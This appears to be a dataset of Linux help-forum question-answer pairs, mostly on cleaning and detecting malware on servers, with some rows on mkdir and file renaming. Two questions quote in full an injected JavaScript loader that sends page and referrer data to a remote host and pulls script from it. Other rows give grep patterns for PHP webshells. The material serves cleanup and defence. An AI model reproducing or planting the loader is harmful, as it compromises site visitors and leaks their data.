output
stringlengths
9
26.3k
input
stringlengths
26
29.8k
instruction
stringlengths
14
159
(Rewritten based on OP's comments) The cpu_hu seems to execute as user postgres, which suggests it might have been started by using a weakness in your PostgreSQL database engine or its configuration. Maybe your PostgreSQL database is accessible from the internet and your database admin password is nonexistent or weak? Or are you running your project as the postgres user? That's a bad idea: a vulnerability in any component used by your project (e.g. in Django) that would allow them to inject SQL commands would then give them a "local admin" access to the database engine, and allow them to steal or corrupt all the data managed by that database engine, not limited to the database(s) of your project only. Database admin access also includes the privilege to run arbitrary OS commands as the database engine user. Otherwise, make a list of every software component used in your project and their versions, and start googling for known vulnerabilities in those versions. Do the malware processes appear if you reboot the system without an internet connection? If they do, you have a local persistent malware hiding somewhere. If not, the infection might be non-persistent, and you might be getting reinfected by another computer as soon as your system boots up.
For past couple of days I have been observing weird processes in one of our server. Most of the time I see multiple instances of executable 10 and sometimes 4 and takes a lot of cpu resources. When examined this I have been seeing the process is started by cron right after starting a process with executable cpu_hu. Which is apparently foreign to my system and simple search did not resolve to anything.Then examined the cpu_hu process, examined exe location then removed accordingly (location in the image points to a venv for a small project our team is working on)even though I removed the binary, after reboot it appeared in a different location and the executables 10, 4 started from memory (no physical executable location)I deleted cpu_hu binary from all the locations of the system stopped the process and rebooted, but after some time cpu_hu binary appears elsewhere. For now i have stopped crond and killed the respective processes. Which seemed to have stopped the process from starting again. At this point I am pretty sure its malicious. How can I get rid of this or rather find the starting point of this malware to prevent it from starting.
Possible Malware: Unable to track starting point
maldet is the best solution for malware detection on Linux. It's using it's own signature database, and can use ClamAV as an engine. I've used it for many years and it has always detected all kinds of malware on production systems.
I looked around for an antivirus on Linux (Arch) or malware scanner, bumped on ClamAV and I don't even remember if I got it to work so fair to say it didn't make the cut at the moment in time. Are there free, good AVs for Linux? I find people saying there are no viruses for Linux, that's why there are no AVs, but I find it hard to believe. One can write malware code for any system. I think it's curious, an ecosystem like Linux with deep roots in open source, does not have an open source malware solution seemingly.
Are there decent, free malware solutions for Linux? [closed]
Use find with -size option: find . -type f -iname '*.exe' -size 133kor find . -type f -iname '*.exe' -size 135783cafter you confirm those are bad files, you can add -delete option to the command to delete those files. from man find: -size n[cwbkMG] File uses n units of space, rounding up. The following suffixes can be used: `b' for 512-byte blocks (this is the default if no suffix is used) `c' for bytes `w' for two-byte words `k' for Kibibytes (KiB, units of 1024 bytes) `M' for Mebibytes (MiB, units of 1024 * 1024 = 1048576 bytes) `G' for Gibibytes (GiB, units of 1024 * 1024 * 1024 = 1073741824 bytes) The size does not count indirect blocks, but it does count blocks in sparse files that are not actu‐ ally allocated. Bear in mind that the `%k' and `%b' format specifiers of -printf handle sparse files differently. The `b' suffix always denotes 512-byte blocks and never 1024-byte blocks, which is dif‐ ferent to the behaviour of -ls. The + and - prefixes signify greater than and less than, as usual; i.e., an exact size of n units does not match. Bear in mind that the size is rounded up to the next unit. Therefore -size -1M is not equivalent to -size -1048576c. The former only matches empty files, the latter matches files from 0 to 1,048,575 bytes.
My external hard disk got a windows virus which makes lots of filename.exe copies of 132.6 kb. When I write find . -type f -name "*.exe" it founds thousands of .exe files and only 100 or 200 of them are my files. Do you know a smart way to extract virus files and delete all at once without losing my data?
How to delete all the "*.exe" files which is 132kb
You could compare the original image to the modified image using, e.g., cmp -l. (Which for true paranoia, you should of course do from a system you didn't run the C program on). That C program appears to just set 1984 bytes to 0: if (lseek(fd, lba * 2048 + 64, SEEK_SET) == -1) goto err_ex; memset(buf, 0, buf_size); ret = write(fd, buf, buf_size);... the rest of it looks like error checking and finding the offset at which to write those 0s. It's possible writing 0s to something could be a backdoor (not a virus), e.g., by knocking out authentication somewhere. But it strikes me as unlikely (I don't think 0x00... is a machine-code noop), and the description of what it does on the page makes more sense. You could also detect that hypothetical backdoor by verifying your packages' checksums (e.g., with debsums on Debian); writing all 0s isn't going to corrupt a program in a way that keeps its checksum good!
I installed elementary OS Juno on an old iMac 5,1. The Computer uses a 32bit EFI, which is not able to boot elementary OS Juno so I decided to follow Matt Gadients guide for a little workaround. You can find the workaround here: https://mattgadient.com/2016/07/11/linux-dvd-images-and-how-to-for-32-bit-efi-macs-late-2006-models/ I am wondering if this modified distro is still safe to use? Matt Gadient describes how to modify the isos with a little C program to make them bootable on an 32bit EFI Mac. I did not download the isos from that site, instead I just downloaded the c program from Matt's site, which you can find as a text here: https://dedicated.mattgadient.com/linux-mac-iso/isomacprog.c.txt I compiled the c programm with cc -g -Wall isomacprog.c -o isomacprog and modified the offical elementary OS Juno distro with it by doing something like ./isomacprog elementaryOSJuno.iso Bytw: the modified iso has the same MD5 checksum like the iso modified by Matt himself, so he definitley hasn't done anything else with the distros. I burned the iso to a DVD and installed it on the iMac. It is running just fine. Yet I haven't connected the computer to the internet since I am not sure if it is still safe to use. I don't know anything about c programing so I'd like to ask if this little c program does anything more than just making the distro bootable? Is it still safe to use this distro or contains it some kind of virus?
Still safe to use distro after applying c program to it?
The commands you posted do nothing useful —they run grep on files whose name ends with 2, and recursively in directories whose name ends with 2. There's a missing space after * (the space after > is permitted but not useful and more confusing than anything): grep -iHlnr 'filesman' * 2>/dev/null grep -iHlnr 'eval.*base64_decode' * 2>/dev/nullThis searches for files containing filesman, or containing eval followed by base64_decode on the same line, in the current directory and its subdirectories recursively. The search is case-insensitive. Look at the manual of grep for the exact meaning of each option. Calling that “malware finding” is a gross exaggeration. It's probably looking for PHP malware, but it might return some legitimate files as well and it only finds a few specific malwares.
I've just spotted in .bash_history file lines below: grep -iHlnr 'filesman' *2> /dev/null grep -iHlnr 'eval.*base64_decode' *2> /dev/nullFrom Google I know that is something like 'malware finding command'. May somebody explain what does it exactly do? (Iknow what is grep for, but that syntax isn't clear to me).
Explain Malware-finding function in bash
Could the malware have happened due to the outdated Apache/2.2.22 software? Possibly. There are a number of vulnerabilities against version 2.2.22 which are listed here:http://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-142323/Apache-Http-Server-2.2.22.htmlAs well as here on Apache's website:http://httpd.apache.org/security/vulnerabilities_22.htmlBut it's much more likely that some software which runs on top of Apache was the point of entry. Outdated? I would definitely call 2.2.22 outdated. It even shows as much on the Apache download page.
I am web hosting websites on Apache/2.2.22 and did a security scan. The scan said the server software is outdated; the web hosting provider says its not outdated and is stable. Someone uploaded malware to non-www directories. Could the malware have happened due to the outdated Apache/2.2.22 software? This is a shared hosting environment.
Hosting on Apache/2.2.22, scan says outdated
Would this program be allowed for example: take a whole screenshot of my desktopUnder X11/X.org, yes, easily. Under Wayland it's complicated but possible.sniff my keystrokes (for later use for sudo as an example)Likewise.listen or watch my microphone or webcamYes.and adding itself in autostart (systemd service or gnome autostart folder, etc.) without me noticing?Yes, for the user session autostart, i.e. ~/.config/autostart/*.desktop. Adding itself as a system service could be possible only via sudo (as well as kernel level/system services exploits) but then if it has sniffed your sudo password, it all becomes trivial.How dangerous could it get and is there any tips how I could secure my data in case of virus penetrating my system (except for backups and not launching malware in the first place)?You could:run a web browser under firejail and confine it to a limited number of directories. It will not help you if you recklessly execute downloaded files. run a web browser in a VM, e.g. KVM/VirtualBox/VMWare Workstation but then VMs have been escaped from though it's a very expensive high grade attack which you're very unlikely to be a target of unless the three letter agencies are interested in you in which case there are easier ways to infiltrate your device (e.g. hardware level sniffers, hidden cameras and cameras planted locally, remote data collection using lasers or extremely sensitive microphones etc.) run a web browser on a remote PC/system - the absolute safest option.
I am interested to know whether is it a reasonable decision to try and restrict my own user account as much as possible to the point where I would need to use my own password much more frequently (now I use it only for mounting new disks and for system updates). For example I downloaded and opened a malicious program without administrative rights (sudo or etc.) on newly installed Ubuntu with default settings. Would this program be allowed for example: take a whole screenshot of my desktop, sniff my keystrokes (for later use for sudo as an example), listen or watch my microphone or webcam and adding itself in autostart (systemd service or gnome autostart folder, etc.) without me noticing? Of course neglecting the possibility of doing this through 0-day exploits. How dangerous could it get and is there any tips how I could secure my data in case of virus penetrating my system (except for backups and not launching malware in the first place)? TLDR: How many rights does the arbitrary usermode(ring3) program have in context of the current non-administrative user?
What is the worst thing a usermode (ring3) virus could do to home linux installation?
The short answer would be 'no'. In fact, after linking both ClamAV and Maldet together, when you run a Maldet scan, it will also include the definitions of ClamAV and will actually improve performance for your MalDet scans.
I am running MalDet (malware detection) and ClamAV (anti-virus) on my RedHat 7.x server and wish to run these processes simultaneously. Other than using CPU resources, can running these two processes at the same time have a negative effect (most importantly, can one effect the other negatively)? I don't think they will but wanted to get any advice the community my have.
Will running MalDet (malware detection) and ClamAV (anti-virus) at the same time cause any issues with the operation of each other?
Your library was probably renamed by mistake at some time from /usr/lib/libselinux.1 to /usr/lib/libext2fs.so.2 . This doesn't prevent ldconfig to find the expected name from the library's content (rather than the library's file name) and thus link the "correct" name. This can be verified by copying any library to some directory and ask ldconfig to update (only) this directory. Here the equivalent on Debian 9: $ mkdir /tmp/foo $ cp -aL /lib/x86_64-linux-gnu/libselinux.so.1 /tmp/foo/libmytest.so.2 $ ls -l /tmp/foo/* -rw-r--r-- 1 test test 155400 Sep 24 2017 /tmp/foo/libmytest.so.2 $ /sbin/ldconfig -v -n /tmp/foo /tmp/foo: libselinux.so.1 -> libmytest.so.2 (changed) $ ls -l /tmp/foo/* -rw-r--r-- 1 test test 155400 Sep 24 2017 /tmp/foo/libmytest.so.2 lrwxrwxrwx 1 test test 14 Jun 5 23:33 /tmp/foo/libselinux.so.1 -> libmytest.so.2By the way libselinux is a common library for software dealing with SELinux. Even the ls, cp, mv, ps commands are usually linked with it (for their respective -Z option).
using strace I have found a behaviour of ldconfig (glibc), I can make no sense of lstat("/usr/lib/libext2fs.so.2", {st_mode=S_IFLNK|0777, st_size=16, ...}) = 0 unlink("/usr/lib/libext2fs.so.2") = 0 symlink("libselinux.so.1", "/usr/lib/libext2fs.so.2") = 0Is there any need to have the shared object library for ext2fs (libext2fs.so.2) to be a symbolic link to libselinux.so.1. How does ldconfig know what to do? It does not seem logical to me that this static binary /usr/bin/ldconfig would have such a behaviour hardcoded, right. However its configuration file /etc/ld.so.conf does not help me much to clear that mystery. What makes all of this even more confusing/suspicious with my distros tools (Arch Linux) I cannot find any package the file belongs to. $ pkgfile /usr/lib/libselinux.so.1does not show any package, while $ pkgfile /usr/lib/libext2fs.so outputs core/e2fsprogs So my question is specifically:what the role of this libselinux.so.1 is here how ldconfig comes to decide to create that symlink (which btw. breaks e2fsck)
why would ldconfig create a symlink to libselinux.so.1 from libext2fs.so.2?
Check this tools:Metasploit Framework NIKTO Chkrootkit Nessus
I want to scan a website's complete data, what's most authentic & user friendly tool for that on linux? Suggest me command line utilites please.
Scan Website Data For Malicious Code & Injections [closed]
The variable $mail is empty because the command mail is not installed. Run apt-get install mailx (debian or ubuntu) or yum install -y mailx (centos or redhat)
Postfix is running. I am trying to send maldet report as a mail but it gives me an error I don't know why? [root@do ~]# maldet --report 170321-0115.21534 [emailprotected] Linux Malware Detect v1.6 (C) 2002-2017, R-fx Networks <[emailprotected]> (C) 2017, Ryan MacDonald <[emailprotected]> This program may be freely redistributed under the terms of the GNU GPL v2/usr/local/maldetect/internals/functions: line 608: -s: command not found maldet(18718): {report} report ID 170321-0115.21534 sent to [emailprotected]And this is the line 608 if [ -f "$sessdir/session.$rid" ] && [ ! -z "$(echo $2 | grep '\@')" ]; th$ cat $sessdir/session.$rid | $mail -s "$email_subj" "$2" eout "{report} report ID $rid sent to $2" 1 exit
Why maldet is not sending report as a mail?
To start with, make sure your .php and .html files are NOT writable by the uid that the web server runs as. The web server needs read and execute permissions on the files and directories but (with possibly a few exceptions like upload directories) it does not need write access to the data it is supposed to be serving. Then grep all the files in your web site (e.g. grep -ir pattern /var/www/) for something specific to this malware. that URL it reinserts is a good choice: grep -ir 'http://www.theorchardnursinghome.co.uk' /var/www/ Unfortunately, it's possible that most of the payload of the attack is encoded with base64 or similar so the grep may not find anything. failing that, grepping for the files it is modifying may work - e.g. grep for header.php - if it writes to header.php, there's a reasonable chance that filename will be (hopefully unencoded) somewhere in the attack script. grep your web log files for the same things. If your attackers managed to gain root on your server then there are endless possibilities for them to hide what they're doing. But check, at least, system crontabs including root's crontab. BTW, this probably belongs on Server Fault rather than here. Or maybe on Webmasters
One of my site was infested with malware once and since then I am seeing every alternate day the header.php files are getting reverted back to older versions (possibly by a script) and a malicious script is inserted somewhere in the file: <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "(>>>> KEEPS CHANGING >>>>>)http://www.theorchardnursinghome.co.uk/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>I have cleansed the server many a times but in vein. I am fully aware that the best option is to reinstall the entire site but I am afraid it's a risky affair as too much customizations have been done over the past and it will take a whole lot of effort to recreate the entire setup. How do I encounter this issue? How to identify the script(s) responsible by running one more bash script maybe? Running inotify isn't a possibility as Hostgator doesn't allow us to install.
Files getting reverted to older version
It could be any number of things but the page link you listed is pretty precises. Network traffic from your ip matches the pattern of an infected machine. The pattern it matches is "Win32/Zbot" so it's not likely to be your Linux box, but you also mention running a Tor Endpoint which means you effectively have no idea what traffic your allowing to go out your IP address. There is, or was, more then likely, a windows client, connected via Tor that sent out some data that matched the pattern of this malware. Rather right or wrong, your responsible for the network traffic leaving your network, including the stuff that originated via Tor, thus an infected machine somewhere out there on the Tor network, could cause your IP to be listed. To correct the problem you have to fix the issue. You have a few options. Stop running a Tor Endpoint Restrict the Tor Endpoint to specific type of access Do some SPI on the outgoing packetsOf course all of these options rather defeat the point of Tor, so ... Once the problem has been addressed, you can de-list the IP, but, as the page states, there only going to do that a few times. Your only two real options seem to be stop being a Tor endpoint, or live with the effects of being on a CBL.
I have some experience with Linux, currently running Ubuntu 14.04.2 LTS. I've disabled (a long time ago) root login - via ssh or webmin. I've changed my tomcat's username (good luck to the f**kers in china that is still trying "tomcat", "admin" or "root"). I have clamAv and maldetect running (finding nothing). I do run a Tor exit node (I use Tor, I like to give back, not doing anything illegal, just valuing my privacy). So I can (like to try and) understand being black listed for running a Tor exit node - it is under my control but I get black listed for being hacked or have a virus or spamming or Natting for a trojan etc. The latest one was CBL, I've looked at all their suggestion but can't find anything. (I'm assuming that these services are not just adding me randomly): What should I look for? Can the listing services pick up malware using my tor exit node? (If so, how do I block it?) Many thanx
Linux and being black listed
I would probably start by using tcpdump to find the culprit. If you have a router that runs linux (many of them do), you can often run tcpdump right on your router. If not, you could try running tcpdump (or wireshark) on a PC that's on the same network as your router. This doesn't always work because ethernet switches don't always copy all traffic to all the ports. In this case, you would have to set up a machine as a router and put it in between your outside router and your internal network and then you can run tcpdump on that. Or you could find an old ethernet hub that doesn't do switching. I have an old one lying around in my kit for that purpose! Once you have a place you can reliably tcpdump from and see your network traffic that exits your network, start by finding google's ip addresses like this: $ host google.com google.com has address 74.125.21.100 google.com has address 74.125.21.113 google.com has address 74.125.21.138 google.com has address 74.125.21.139 google.com has address 74.125.21.101 google.com has address 74.125.21.102 google.com has IPv6 address 2607:f8b0:4002:c06::8b google.com mail is handled by 40 alt3.aspmx.l.google.com. google.com mail is handled by 20 alt1.aspmx.l.google.com. google.com mail is handled by 30 alt2.aspmx.l.google.com. google.com mail is handled by 50 alt4.aspmx.l.google.com. google.com mail is handled by 10 aspmx.l.google.com.Those 74.125.21.X addresses may be different from your vantage point on the net. To find out what traffic is hitting those addresses in tcpdump, use a command like this: tcpdump dst host 173.194.219.113 or dst host 173.194.219.139 or dst host 173.194.219.100 or dst host 173.194.219.138 or dst host 173.194.219.102 or dst host 173.194.219.101Now sit back and watch and see if you can spot one single host hitting google way more than another. You may want to dump the output of tcpdump into a file and use some scripting to sort it later. Save the tcpdump into a tmp like this (replace ... with arg list from above): tcpdump ... > /tmp/xthen let that run for a while and ^C it. Then use this to find out who the biggest users of google are: awk '{ print $3 }' /tmp/x | uniq -c | sort -nThe tricky part of all of this is going to be getting a machine that you can run tcpdump on that can view all the network traffic.
At my workplace we tend to get those annoying captchas once in a while when we are trying for search something in Google. When we got into that page it says that our network is trying to access Google pretty fast and in multiple times. We are suspecting that there's a computer which is infected with some kind of virus or script which is running in the background and trying to do something with Google or other hosts. I was wondering what tool I can use in Linux to discover the bad node in the network or how can I start to debug this problem.
How to know which computer is trying to access a specific host
By using ip route get $IP and ip a it has been determined that the used IP address did not in fact belong to the server under investigation, so there is no mystery nginx running on this server but in fact on the server that does own that IP address.
I have an Ubuntu 14.04 server with Apache 2.4.7 running there, hosting one site on 80 port. Today I discovered that every request to 80 port redirects to another website with response: HTTP/1.1 301 Moved Permanently Server: nginx/1.6.2 Date: Thu, 15 Jan 2015 13:37:18 GMT Content-Type: text/html Content-Length: 184 Connection: keep-alive Location: some.website.comI don't have nginx installed, bit still searched for a nginx process with ps ax | grep nginx command with one result: 25759 pts/1 S+ 0:00 grep --color=auto nginx. It didn't seem like the offending process but still: kill 25759 yielded -bash: kill: (25759) - No such process Next, I stopped apache (it changed nothing about redirects), and decided to see, who listens to 80 port with the command lsof -i :80 | grep LISTEN which told me nothing, and if I list all listeners with the command: lsof -i | grep LISTEN I get the following list: sshd 673 root 3u IPv4 7078 0t0 TCP *:ssh (LISTEN) tinyproxy 972 root 0u IPv4 7654 0t0 TCP *:9582 (LISTEN) Xtightvnc 1173 root 0u IPv4 7914 0t0 TCP *:x11-1 (LISTEN)All of which are known entities. If I start apache the following line is also there: apache2 25926 root 4u IPv6 139312 0t0 TCP *:http (LISTEN)Next I thought about iptables, but iptables -L shows empty list: Chain INPUT (policy ACCEPT) target prot opt source destinationChain FORWARD (policy ACCEPT) target prot opt source destinationChain OUTPUT (policy ACCEPT) target prot opt source destinationSo, the question is how do I find what causes this redirect (checked from several different computers with different internet providers) and remove it? Update: 1. iptables -t nat -L yields this list: Chain PREROUTING (policy ACCEPT) target prot opt source destinationChain INPUT (policy ACCEPT) target prot opt source destinationChain OUTPUT (policy ACCEPT) target prot opt source destinationChain POSTROUTING (policy ACCEPT) target prot opt source destination MASQUERADE all -- anywhere anywhereHow did I obtain the redirect response that you pasted into your question? Five ways:On remote computer via Google Chrome and Charles proxy Request with ip: GET / HTTP/1.1 Host: 37.139.9.156 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US;q=0.6,en;q=0.4Response was as described at the beginning of the question. But remote computer via Google Chrome and Charles proxy with hostname the response was correct (no redirect). Request: GET / HTTP/1.1 Host: hostname Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US;q=0.6,en;q=0.4On server via curl -v http://ip * Rebuilt URL to: http://ip/ * Hostname was NOT found in DNS cache * Trying ip... * Connected to ip (ip) port 80 (#0) > GET / HTTP/1.1 > User-Agent: curl/7.35.0 > Host: ip > Accept: */* > < HTTP/1.1 301 Moved Permanently * Server nginx/1.6.2 is not blacklisted < Server: nginx/1.6.2 < Date: Thu, 15 Jan 2015 14:25:20 GMT < Content-Type: text/html < Content-Length: 184 < Connection: keep-alive < Location: http://www.sputton.com/ < <html> <head><title>301 Moved Permanently</title></head> <body bgcolor="white"> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx/1.6.2</center> </body> </html> * Connection #0 to host ip left intactOn server via curl -v http://localhost * Connected to localhost (127.0.0.1) port 80 (#0) > GET / HTTP/1.1 > User-Agent: curl/7.35.0 > Host: localhost > Accept: */* > < HTTP/1.1 200 OK < Date: Thu, 15 Jan 2015 14:24:48 GMT * Server Apache/2.4.7 (Ubuntu) is not blacklisted < Server: Apache/2.4.7 (Ubuntu) < Access-Control-Allow-Origin: * < Access-Control-Allow-Headers: Authorization < Access-Control-Allow-Methods: POST, GET, OPTIONS < CACHE-CONTROL: no-cache < EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT < PRAGMA: no-cache < CONTENT-LENGTH: 7134 < Vary: Accept-Encoding < Content-Type: text/html; charset=utf-8 < Correct body output * Connection #0 to host localhost left intactOn server via curl -v http://hostname * Rebuilt URL to: hostname * Hostname was NOT found in DNS cache * Trying ip... * Connected to hostname (ip) port 80 (#0) > GET / HTTP/1.1 > User-Agent: curl/7.35.0 > Host: hostname > Accept: */* > < HTTP/1.1 200 OK < Date: Thu, 15 Jan 2015 14:32:01 GMT * Server Apache/2.4.7 (Ubuntu) is not blacklisted < Server: Apache/2.4.7 (Ubuntu) < Access-Control-Allow-Origin: * < Access-Control-Allow-Headers: Authorization < Access-Control-Allow-Methods: POST, GET, OPTIONS < CACHE-CONTROL: no-cache < EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT < PRAGMA: no-cache < CONTENT-LENGTH: 7134 < Vary: Accept-Encoding < Content-Type: text/html; charset=utf-8 < Correct body output * Connection #0 to host hostname left intactSo requesting pages via hostname works, but direct ip request fails.
Unknown cause for redirect on 80 port
Firstly, I agree with the comments above: Don't use sed to recover from being hacked. You will always wonder if you missed something. Restore from backup, period. However, the literal question you asked, how to remove a long string everywhere it appears without escaping every special character, is somewhat easier to handle. I'm making some inferences/assumptions from your question which you didn't actually state directly:That the string to be removed is a single line. That it's the same each time it occurs. That it needs to be removed, not replaced with something else.If the above assumptions are correct, do the following:Put the string to be removed (including any trailing whitespace) into a file by itself, called e.g. hackline.txt. Put this one level above the directory you're going to be handling. Copy your entire directory in case of mistakes. cp -a mydir mydircopyRun the following loop on your directory (or the copy) to remove all instances of the hackline: cd mydir for f in *; do [ -f "$f" ] && [ -r "$f" ] || continue grep -vxFf ../hackline.txt "$f" > "$f.fixed" && mv -- "$f.fixed" "$f" doneThe concept here is that you use hackline.txt as a list of fixed strings that must match the entire line, then you use grep to only get the lines that don't match that list of strings. -x means "entire line"; -F means "fixed string, not regex"; -v inverts the search; -f accepts a list of patterns in a file. If your website directory is hierarchical rather than flat (which is actually fairly likely), you could use find instead of a for loop: find mydir -type f ! -name \*.fixed -exec sh -c 'grep -vxFf ../hackline.txt "$1" > "$1.fixed"' sh {} \; find mydir -type f -name \*.fixed -exec sh -c 'mv -- "$1" "${1%.fixed}"' sh {} \;Then use a recursive diff to check that everything is as it should be: diff -r mydircopy mydir
My site was hacked / infected. I replaced the url of the malicious link, but other elements in the malicious script are still making my site get blocked. Without inserting a hundred or so "escapes", how can I remove the following script from 3 dozen files on my site? < script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "hxxp://xxxxx_hack_was_here_z_s_e_r_f_._c_o_m/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('< script type="text/javascript" src="' + f_url + '">' + '<' + '/ script>');} < /script> Other pages on stack-exchange do not answer this question. To replace the malicious url with xxxx_hack_was_here etc, I used: find . -type f -name "*.php" -exec sed -i 's/zserf.com/xxxxx_hack_was here_z_serf/g' {} +
replace long text string (script with MANY special characters). sed, awk, grep
Linux is a very secure system, however it isn't full free of vulnerabilities. There are malware known as rootkits that can get to a Unix/Linux system and steal information, destoy data,etc. However for rootkits being successful the system must be insecure / bad managed, just because a Linux system is as secure as its administrator is aware of security. These are the most important tasks to keep a Linux distribution secure:Only install software from the distribution repositories (apt-get, yum...). Avoid downloading pre-packaged (.deb, .rpm) software unless it comes from very known sources. Learn to use IP Tables and create a configuration that let pass through your system only the traffic that you want to have. Keep the system updated. The distribution repositories are updated as soon as possible when a vulnerability is discovered. Understand user permissions and be as restrictive as possible. Disable SSH passwords and enable login using SSH keys. Enforce the use of strong passwords. Lock the root account, so nobody can log as root and whoever needs root permissions will use sudo. Install and learn to use SELinux. It will increase the basic Linux security.
Is linux free from almost all security vulnerabilities when compared with windows? If there are so, can i install any patches to fix them? Thanks in advance.
Is linux secure? [duplicate]
$ mkdir -p foo/bar/zoo/andsoforthParameter p stands for 'parents'.
Is there a linux command that I'm overlooking that makes it possible to do something along the lines of: (pseudo) $ mkdir -R foo/bar/zoo/andsoforthOr is there no alternative but to make the directories one at a time?
recursive mkdir
This is the one-liner that you need. No other config needed: mkdir longtitleproject && cd $_The $_ variable, in bash, is the last argument given to the previous command. In this case, the name of the directory you just created. As explained in man bash: _ At shell startup, set to the absolute pathname used to invoke the shell or shell script being executed as passed in the envi‐ ronment or argument list. Subsequently, expands to the last argument to the previous command, after expansion. Also set to the full pathname used to invoke each command executed and placed in the environment exported to that command. When check‐ ing mail, this parameter holds the name of the mail file cur‐ rently being checked."$_" is the last argument of the previous command.Use cd $_ to retrieve the last argument of the previous command instead of cd !$ because cd !$ gives the last argument of previous command in the shell history: cd ~/ mkdir folder && cd !$you end up home (or ~/ ) cd ~/ mkdir newfolder && cd $_you end up in newfolder under home !! ( or ~/newfolder )
I find myself repeating a lot of: mkdir longtitleproject cd longtitleprojectIs there a way of doing it in one line without repeating the directory name? I'm on bash here.
Is there a one-liner that allows me to create a directory and move into it at the same time?
Function? mkcdir () { mkdir -p -- "$1" && cd -P -- "$1" }Put the above code in the ~/.bashrc, ~/.zshrc or another file sourced by your shell. Then source it by running e.g. source ~/.bashrc to apply changes. After that simply run mkcdir foo or mkcdir "nested/path/in quotes". Notes:"$1" is the first argument of the mkcdir command. Quotes around it protects the argument if it has spaces or other special characters. -- makes sure the passed name for the new directory is not interpreted as an option to mkdir or cd, giving the opportunity to create a directory that starts with - or --. -p used on mkdir makes it create extra directories if they do not exist yet, and -P used makes cd resolve symbolic links. Instead of source-ing the rc, you may also restart the terminal emulator/shell.
is there any way (what is the easiest way in bash) to combine the following: mkdir foo cd fooThe manpage for mkdir does not describe anything like that, maybe there is a fancy version of mkdir? I know that cd has to be shell builtin, so the same would be true for the fancy mkdir... Aliasing?
Combined `mkdir` and `cd`? [duplicate]
The install utility will do this, if given the source file /dev/null. The -D argument says to create all the parent directories: anthony@Zia:~$ install -D /dev/null /tmp/a/b/c anthony@Zia:~$ ls -l /tmp/a/b/c -rwxr-xr-x 1 anthony anthony 0 Jan 30 10:31 /tmp/a/b/cNot sure if that's a bug or not—its behavior with device files isn't mentioned in the manpage. You could also just give it a blank file (newly created with mktemp, for example) as the source.
mkdir -p will create a directory; it will also make parent directories as needed. Does a similar command exist for files, that will create a file and parent directories as needed?
mkdir -p for files
mkdir -p would not give you an error if the directory already exists and the contents for the directory will not change. Manual entry for mkdir
Say I have a folder: ./folder/Inside it there are many files and even sub-directories. When I execute: mkdir -p folderI won't see any errors even warnings. So just want to confirm, is there anything lost or changed in result of this command?
Is mkdir -p totally safe when creating folder already exists
mkdir accepts multiple path arguments: mkdir -p -- a/foo b/bar a/baz
How can I create multiple nested directories in one command? mkdir -p /just/one/dirBut I need to create multiple different nested directories...
Creating multiple nested directories with one command
You can use the perl rename utility (aka prename or file-rename) to rename the directories. NOTE: This is not to be confused with rename from util-linux, or any other version. rename -n 's/([[:cntrl:]])/ord($1)/eg' run_*/This uses perl's ord() function to replace each control-character in the filename with the ordinal number for that character. e.g ^A becomes 1, ^B becomes 2, etc. The -n option is for a dry-run to show what rename would do if you let it. Remove it (or replace it with -v for verbose output) to actually rename. The e modifier in the s/LHS/RHS/eg operation causes perl to execute the RHS (the replacement) as perl code, and the $1 is the matched data (the control character) from the LHS. If you want zero-padded numbers in the filenames, you could combine ord() with sprintf(). e.g. $ rename -n 's/([[:cntrl:]])/sprintf("%02i",ord($1))/eg' run_*/ | sed -n l rename(run_\001, run_01)$ rename(run_\002, run_02)$ rename(run_\003, run_03)$ rename(run_\004, run_04)$ rename(run_\005, run_05)$ rename(run_\006, run_06)$ rename(run_\a, run_07)$ rename(run_\b, run_08)$ rename(run_\t, run_09)$The above examples work if and only if sp.run_number in your matlab script was in the range of 0..26 (so it produced control-characters in the directory names). To deal with ANY 1-byte character (i.e. from 0..255), you'd use: rename -n 's/run_(.)/sprintf("run_%03i",ord($1))/e' run_*/If sp.run_number could be > 255, you'd have to use perl's unpack() function instead of ord(). I don't know exactly how matlab outputs an unconverted int in a string, so you'll have to experiment. See perldoc -f unpack for details. e.g. the following will unpack both 8-bit and 16-bit unsigned values and zero-pad them to 5 digits wide: rename -n 's/run_(.*)/sprintf("run_%05i",unpack("SC",$1))/e' run_*/
